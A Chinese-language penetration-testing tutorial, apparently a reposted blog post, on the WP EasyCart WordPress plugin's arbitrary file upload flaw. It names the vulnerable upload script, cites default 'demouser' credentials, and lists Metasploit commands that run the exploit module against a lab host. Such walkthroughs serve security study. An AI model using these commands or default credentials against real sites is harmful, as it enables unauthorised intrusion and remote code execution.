WordPress实战渗透测试:利用WP EasyCart插件的任意文件上传漏洞(远程代码执行漏洞)

用于WordPress的WordPress购物车(WP EasyCart)插件包含一个允许远程攻击者执行任意PHP代码的漏洞。存在此缺陷是因为/inc/amfphp/administration/banneruploaderscript.php脚本未正确验证或清理用户上载的文件。通过上载.php文件,远程系统将文件放在用户可访问的路径中。直接请求上载的文件将允许攻击者使用Web服务器的权限执行脚本。在版本<= 3.0.8中,可以使用具有任何角色的用户的WordPress凭据来完成身份验证。在以后的版本中,任何管理员用户都需要使用有效的EasyCart管理员密码。EasyCart的默认安装将设置一个名为“demouser”的用户,其预设密码为“demouser”。
利用目标
WP-easycart
需求
攻击者:kali Linux
受害者PC:Windows 7
打开Kali终端类型  msfconsole
利用WP EasyCart插件的任意文件上传漏洞(远程代码执行漏洞)来渗透测试WordPress
现在输入  exploit use / unix / webapp / wp_ easycart_unrestricted_file_upload
msf exploit (wp_easycart_unrestricted_file_upload)>set targeturi wordpress
msf exploit (wp_easycart_unrestricted_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)
msf exploit (wp_easycart_unrestricted_file_upload)>set rport 80
msf exploit (wp_easycart_unrestricted_file_upload)>exploit    
利用WP EasyCart插件的任意文件上传漏洞(远程代码执行漏洞)来渗透测试WordPress
转载请注明本文链接: http://www.mayidui.net/t2320.html
游客
登录后才可以回帖,登录 或者 注册